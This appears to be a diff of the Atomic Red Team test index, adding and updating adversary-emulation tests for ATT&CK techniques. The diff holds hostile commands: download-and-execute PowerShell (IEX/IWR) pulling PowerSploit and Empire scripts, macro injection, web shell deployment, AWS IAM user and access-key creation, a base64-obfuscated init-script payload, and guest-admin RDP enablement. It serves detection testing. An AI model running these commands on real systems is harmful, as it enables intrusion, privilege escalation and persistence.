-        Executes the code specified within the .dotm template.Requires download of
-        WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx.  Opens
-        Calculator.exe when test sucessfully executed, while AV turned off.
-
-'
+      description: "Open a .docx file that loads a remote .dotm macro enabled template
+        from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm
+        \nExecutes the code specified within the .dotm template.\nRequires download
+        of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx.
+        \ \nDefault docs file opens Calculator.exe when test sucessfully executed,
+        while AV turned off.\n"
       supported_platforms:
       - windows
       input_arguments:
-        docx file:
+        docx_file:
           description: Location of the test docx file on the local filesystem.
           type: Path
           default: PathToAtomicsFolder\T1221\src\Calculator.docx
-        dotm template:
-          description: Location of the test dotm template on the remote server.
-          type: Path
-          default: https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm
       dependency_executor_name: powershell
       dependencies:
       - description: ''
         prereq_command: ''
         get_prereq_command: ''
       executor:
-        command: 'start PathToAtomicsFolder\T1221\src\Calculator.docx
+        command: 'start #{docx_file}
 
 '
         name: command_prompt
@@ -34801,8 +35174,9 @@ defense-evasion:
       supported_platforms:
       - windows
       executor:
-        command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1'
-          -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
         name: powershell
         elevation_required: true
     - name: "`SeDebugPrivilege` token duplication"
@@ -34813,8 +35187,9 @@ defense-evasion:
       supported_platforms:
       - windows
       executor:
-        command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1'
-          -UseBasicParsing); Get-System -Technique Token -Verbose
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
         name: powershell
         elevation_required: true
   T1205:
@@ -36382,6 +36757,39 @@ persistence:
 
 '
         name: powershell
+    - name: AWS - Create a group and add a user to that group
+      auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122
+      description: 'Adversaries create AWS group, add users to specific to that group
+        to elevate their privilieges to gain more accesss
+
+'
+      supported_platforms:
+      - iaas:aws
+      input_arguments:
+        username:
+          description: Name of the AWS group to create
+          type: String
+          default: atomicredteam
+      dependencies:
+      - description: 'Check if the user exists, we can only add a user to a group
+          if the user exists.
+
+'
+        prereq_command: 'aws iam list-users | grep #{username}
+
+'
+        get_prereq_command: 'echo Please run atomic test T1136.003, before running
+          this atomic test
+
+'
+      executor:
+        command: |
+          aws iam create-group --group-name #{username}
+          aws iam add-user-to-group --user-name #{username} --group-name #{username}
+        cleanup_command: |
+          aws iam remove-user-from-group --user-name #{username} --group-name #{username}
+          aws iam delete-group --group-name #{username}
+        name: sh
   T1547.014:
     technique:
       external_references:
@@ -36635,7 +37043,42 @@ persistence:
       x_mitre_platforms:
       - IaaS
       - Azure AD
-    atomic_tests: []
+      identifier: T1098.001
+    atomic_tests:
+    - name: AWS - Create Access Key and Secret Key
+      auto_generated_guid: 8822c3b0-d9f9-4daf-a043-491160a31122
+      description: 'Adversaries create their own new access and secret keys to programatically
+        interact with AWS environment, which is already compromised
+
+'
+      supported_platforms:
+      - iaas:aws
+      input_arguments:
+        username:
+          description: Create new AWS access and secret keys for the user
+          type: String
+          default: atomicredteam
+      dependencies:
+      - description: 'Check if the user exists.
+
+'
+        prereq_command: 'aws iam list-users | grep #{username}
+
+'
+        get_prereq_command: 'echo Please run atomic test T1136.003, before running
+          this atomic
+
+'
+      executor:
+        command: |
+          aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds
+          cd $PathToAtomicsFolder/T1098.001/bin/
+          ./aws_secret.sh
+        cleanup_command: |
+          access_key=`cat $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds| jq -r '.AccessKey.AccessKeyId'`
+          aws iam delete-access-key --access-key-id $access_key --user-name #{username}
+          rm $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds
+        name: sh
   T1546.009:
     technique:
       external_references:
@@ -36802,7 +37245,8 @@ persistence:
         computer starts up various applications and may in fact drive you crazy. A
         reliable way to make the message box appear and verify the \nAppInit Dlls
         are loading is to start the notepad application. Be sure to run the cleanup
-        commands afterwards so you don't keep getting message boxes showing up\n"
+        commands afterwards so you don't keep getting message boxes showing up.\n\nNote:
+        If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls\n"
       supported_platforms:
       - windows
       input_arguments:
@@ -37435,7 +37879,7 @@ persistence:
         command: |
           bitsadmin.exe /create #{bits_job_name}
           bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
-          bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} ""
+          bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} NULL
           bitsadmin.exe /resume #{bits_job_name}
           timeout 5
           bitsadmin.exe /complete #{bits_job_name}
@@ -38205,7 +38649,43 @@ persistence:
       - Office 365
       - IaaS
       - Google Workspace
-    atomic_tests: []
+      identifier: T1136.003
+    atomic_tests:
+    - name: AWS - Create a new IAM user
+      auto_generated_guid: 8d1c2368-b503-40c9-9057-8e42f21c58ad
+      description: 'Creates a new IAM user in AWS. Upon successful creation, a new
+        user will be created. Adversaries create new IAM users so that their malicious
+        activity do not interupt the normal functions of the compromised users and
+        can remain undetected for a long time
+
+'
+      supported_platforms:
+      - iaas:aws
+      input_arguments:
+        username:
+          description: Username of the IAM user to create in AWS
+          type: String
+          default: atomicredteam
+      dependencies:
+      - description: 'Check if ~/.aws/credentials file has a default stanza is configured
+
+'
+        prereq_command: 'cat ~/.aws/credentials | grep "default"
+
+'
+        get_prereq_command: 'echo Please install the aws-cli and configure your AWS
+          defult profile using: aws configure
+
+'
+      executor:
+        command: 'aws iam create-user --user-name #{username}
+
+'
+        cleanup_command: 'aws iam delete-user --user-name #{username}
+
+'
+        name: sh
+        elevation_required: false
   T1078.004:
     technique:
       id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65
@@ -39064,9 +39544,9 @@ persistence:
     atomic_tests:
     - name: Enable Guest account with RDP capability and admin priviliges
       auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
-      description: After execution the Default Guest account will be enabled (Active)
-        and added to Administrators and Remote Desktop Users Group, and desktop will
-        allow multiple RDP connections
+      description: |
+        After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,
+        and desktop will allow multiple RDP connections.
       supported_platforms:
       - windows
       input_arguments:
@@ -39078,6 +39558,10 @@ persistence:
           description: Specify the guest password
           type: String
           default: Password123!
+        remove_rdp_access_during_cleanup:
+          description: Set to 1 if you want the cleanup to remove RDP access to machine
+          type: Integer
+          default: 0
       executor:
         command: |-
           net user #{guest_user} /active:yes
@@ -39090,8 +39574,9 @@ persistence:
           net user #{guest_user} /active:no >nul 2>&1
           net localgroup administrators #{guest_user} /delete >nul 2>&1
           net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1
-          reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1
-          reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1
+          if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup)
+          if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1)
+          if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
         name: command_prompt
         elevation_required: true
   T1136.002:
@@ -41670,11 +42155,11 @@ persistence:
       - windows
       executor:
         command: |
-          reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4
-          if not exist  %APPDATA%\Microsoft\Outlook ( md %APPDATA%\Microsoft\Outlook\ )
+          reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /t REG_DWORD /d 1 /f
+          mkdir  %APPDATA%\Microsoft\Outlook\ >nul 2>&1
           echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM
         cleanup_command: |
-          reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f
+          reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /f
           del %APPDATA%\Microsoft\Outlook\VbaProject.OTM
         name: command_prompt
   T1137.001:
@@ -43942,7 +44427,8 @@ persistence:
 
 '
       executor:
-        command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
+        command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
+          (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
           -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\"
           -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n"
         name: powershell
@@ -44860,6 +45346,48 @@ persistence:
           rm -rf #{systemd_service_path}/#{systemd_service_file}
           systemctl daemon-reload
         name: bash
+    - name: Create Systemd Service file,  Enable the service , Modify and Reload the
+        service.
+      auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89
+      description: "This test creates a systemd service unit file and enables it to
+        autostart on boot. Once service is created and enabled, it also modifies this
+        same service file showcasing both Creation and Modification of system process.
+        \n"
+      supported_platforms:
+      - linux
+      dependencies:
+      - description: 'System must be Ubuntu ,Kali OR CentOS.
+
+'
+        prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat
+          /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i
+          ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi;
+
+'
+        get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS.
+
+'
+      executor:
+        name: bash
+        elevation_required: true
+        command: "cat > /etc/init.d/T1543.002 << EOF\n#!/bin/bash\n### BEGIN INIT
+          INFO\n# Provides : Atomic Test T1543.002\n# Required-Start: $all\n# Required-Stop
+          : \n# Default-Start: 2 3 4 5\n# Default-Stop: \n# Short Description: Atomic
+          Test for Systemd Service Creation\n### END INIT INFO\npython3 -c \"import
+          os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))\"\nEOF\n\nchmod
+          +x /etc/init.d/T1543.002\nif [ $(cat /etc/os-release | grep -i ID=ubuntu)
+          ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002
+          defaults; elif [ $(cat /etc/os-release | grep -i 'ID=\"centos\"') ]; then
+          chkconfig T1543.002 on ; else echo \"Please run this test on Ubnutu , kali
+          OR centos\" ; fi ;\nsystemctl enable T1543.002\nsystemctl start T1543.002\n\necho
+          \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\\\"\"
+          | sudo tee -a /etc/init.d/T1543.002\nsystemctl daemon-reload\nsystemctl
+          restart T1543.002\n"
+        cleanup_command: |
+          systemctl stop T1543.002
+          systemctl disable T1543.002
+          rm -rf /etc/init.d/T1543.002
+          systemctl daemon-reload
   T1053.006:
     technique:
       id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21
@@ -45699,15 +46227,16 @@ persistence:
         get_prereq_command: |
           New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp"
-          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/test.jsp"
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/tests.jsp"
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx"
       executor:
-        command: 'xcopy #{web_shells} #{web_shell_path}
-
-'
-        cleanup_command: 'del #{web_shell_path} /q >nul 2>&1
+        command: 'xcopy /I /Y #{web_shells} #{web_shell_path}
 
 '
+        cleanup_command: |
+          del #{web_shell_path}\b.jsp /q >nul 2>&1
+          del #{web_shell_path}\tests.jsp /q >nul 2>&1
+          del #{web_shell_path}\cmd.aspx /q >nul 2>&1
         name: command_prompt
   T1546.003:
     technique:
@@ -46877,6 +47406,21 @@ impact:
         cleanup_command: |
           $which_openssl rsautl -decrypt -inkey #{private_key_path} -in #{encrypted_file_path}
           rm #{encrypted_file_path}
+    - name: PureLocker Ransom Note
+      auto_generated_guid: 649349c7-9abf-493b-a7a2-b1aa4d141528
+      description: "building the IOC (YOUR_FILES.txt) for the PureLocker ransomware
+        \nhttps://www.bleepingcomputer.com/news/security/purelocker-ransomware-can-lock-files-on-windows-linux-and-macos/\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: 'echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt
+
+'
+        cleanup_command: 'del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1
+
+'
   T1565:
     technique:
       external_references:
@@ -49663,10 +50207,9 @@ discovery:
       supported_platforms:
       - windows
       executor:
-        command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1''
-          -UseBasicParsing); Find-LocalAdminAccess -Verbose
-
-'
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose
         name: powershell
     - name: Find local admins on all machines in domain (PowerView)
       auto_generated_guid: a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd
@@ -49678,10 +50221,9 @@ discovery:
       supported_platforms:
       - windows
       executor:
-        command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1''
-          -UseBasicParsing); Invoke-EnumerateLocalAdmin  -Verbose
-
-'
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin  -Verbose
         name: powershell
     - name: Find Local Admins via Group Policy (PowerView)
       auto_generated_guid: 64fdb43b-5259-467a-b000-1b02c00e510a
@@ -49697,9 +50239,9 @@ discovery:
           type: Path
           default: "$env:COMPUTERNAME"
       executor:
-        command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1''
-          -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name}
-          -Verbose'
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"
         name: powershell
     - name: Enumerate Users Not Requiring Pre Auth (ASRepRoast)
       auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b
@@ -49759,10 +50301,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
 '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-'
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -f (objectcategory=group)\n"
         name: command_prompt
@@ -50841,11 +51382,22 @@ discovery:
 '
       supported_platforms:
       - windows
-      executor:
-        command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1''
-          -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Endpoint must be joined to domain
 
 '
+        prereq_command: 'if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain)
+          {exit 0} else {exit 1}
+
+'
+        get_prereq_command: '"Join system to domain"
+
+'
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose
         name: powershell
   T1040:
     technique:
@@ -52337,7 +52889,7 @@ discovery:
         vbscript:
           description: Path to sample script
           type: String
-          default: PathToAtomicsFolder\T1595.002\src\griffon_recon.vbs
+          default: PathToAtomicsFolder\T1082\src\griffon_recon.vbs
       executor:
         command: 'cscript #{vbscript}'
         name: powershell
@@ -52908,10 +53460,9 @@ discovery:
       supported_platforms:
       - windows
       executor:
-        command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1''
-          -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
-
-'
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
         name: powershell
   T1007:
     technique:
@@ -58178,7 +58729,8 @@ execution:
 '
       executor:
         command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
           $macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"cscript.exe #{jse_path}`"`n"
           Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
         cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore
@@ -58239,7 +58791,8 @@ execution:
 '
       executor:
         command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
           $macrocode = "  a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
           Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
         name: powershell
@@ -58277,7 +58830,8 @@ execution:
 '
       executor:
         command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
           $macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
           Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
         name: powershell
@@ -58314,7 +58868,8 @@ execution:
 '
       executor:
         command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
           $macrocode = "   Open `"#{bat_path}`" For Output As #1`n   Write #1, `"calc.exe`"`n   Close #1`n   a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
           Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
         name: powershell
@@ -58448,7 +59003,8 @@ execution:
 '
       executor:
         command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
           Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome"
         name: powershell
     - name: Potentially Unwanted Applications (PUA)
@@ -59667,7 +60223,8 @@ execution:
 
 '
       executor:
-        command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
+        command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
+          (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
           -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\"
           -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n"
         name: powershell
@@ -60076,7 +60633,41 @@ execution:
       x_mitre_remote_support: true
       x_mitre_contributors:
       - Shane Tully, @securitygypsy
-    atomic_tests: []
+      identifier: T1072
+    atomic_tests:
+    - name: Radmin Viewer Utility
+      auto_generated_guid: b4988cad-6ed2-434d-ace5-ea2670782129
+      description: 'An adversary may use Radmin Viewer Utility to remotely control
+        Windows device, this will start the radmin console.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        radmin_installer:
+          description: Radmin Viewer installer
+          type: Path
+          default: "%TEMP%\\RadminViewer.msi"
+        radmin_exe:
+          description: The radmin.exe executable from RadminViewer.msi
+          type: Path
+          default: "%PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe"
+      dependencies:
+      - description: 'Radmin Viewer Utility must be installed at specified location
+          (#{radmin_exe})
+
+'
+        prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1)
+
+'
+        get_prereq_command: |
+          echo Downloading radmin installer
+          bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer}
+          msiexec /i "#{radmin_installer}" /qn
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: '"#{radmin_exe}"'
   T1153:
     technique:
       id: attack-pattern--45d84c8b-c1e2-474d-a14d-69b5de0a2bc0
@@ -60546,7 +61137,8 @@ execution:
 '
       executor:
         command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
           Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
         cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine
           -like "*mshta*"}  | % { "$(Stop-Process $_.ProcessID)" } | Out-Null
@@ -60583,7 +61175,8 @@ execution:
 
 '
       executor:
-        command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
+        command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
+          (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
           -UseBasicParsing) \nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1059.005\\src\\T1059_005-macrocode.txt\"
           -officeProduct \"Word\" -sub \"Extract\"\n"
         cleanup_command: 'Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin"
@@ -62428,7 +63021,41 @@ lateral-movement:
       x_mitre_remote_support: true
       x_mitre_contributors:
       - Shane Tully, @securitygypsy
-    atomic_tests: []
+      identifier: T1072
+    atomic_tests:
+    - name: Radmin Viewer Utility
+      auto_generated_guid: b4988cad-6ed2-434d-ace5-ea2670782129
+      description: 'An adversary may use Radmin Viewer Utility to remotely control
+        Windows device, this will start the radmin console.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        radmin_installer:
+          description: Radmin Viewer installer
+          type: Path
+          default: "%TEMP%\\RadminViewer.msi"
+        radmin_exe:
+          description: The radmin.exe executable from RadminViewer.msi
+          type: Path
+          default: "%PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe"
+      dependencies:
+      - description: 'Radmin Viewer Utility must be installed at specified location
+          (#{radmin_exe})
+
+'
+        prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1)
+
+'
+        get_prereq_command: |
+          echo Downloading radmin installer
+          bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer}
+          msiexec /i "#{radmin_installer}" /qn
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: '"#{radmin_exe}"'
   T1080:
     technique:
       id: attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c
@@ -64253,6 +64880,55 @@ command-and-control:
           del #{local_path} >nul 2>&1
           del %temp%\MpCmdRun.log >nul 2>&1
         name: command_prompt
+    - name: whois file download
+      auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab
+      description: 'Download a remote file using the whois utility
+
+'
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        remote_host:
+          description: Remote hostname or IP address
+          type: String
+          default: localhost
+        remote_port:
+          description: Remote port to connect to
+          type: Integer
+          default: 8443
+        output_file:
+          description: Path of file to save output to
+          type: Path
+          default: "/tmp/T1105.whois.out"
+        query:
+          description: Query to send to remote server
+          type: String
+          default: Hello from Atomic Red Team test T1105
+        timeout:
+          description: Timeout period before ending process (seconds)
+          type: Integer
+          default: 1
+      dependencies:
+      - description: 'The whois and timeout commands must be present
+
+'
+        prereq_command: 'which whois && which timeout
+
+'
+        get_prereq_command: 'echo "Please install timeout and the whois package"
+
+'
+      executor:
+        name: sh
+        elevation_required: false
+        command: 'timeout --preserve-status #{timeout} whois -h #{remote_host} -p
+          #{remote_port} "#{query}" > #{output_file}
+
+'
+        cleanup_command: 'rm -f #{output_file}
+
+'
   T1090.001:
     technique:
       external_references:
@@ -66948,9 +67624,9 @@ initial-access:
     atomic_tests:
     - name: Enable Guest account with RDP capability and admin priviliges
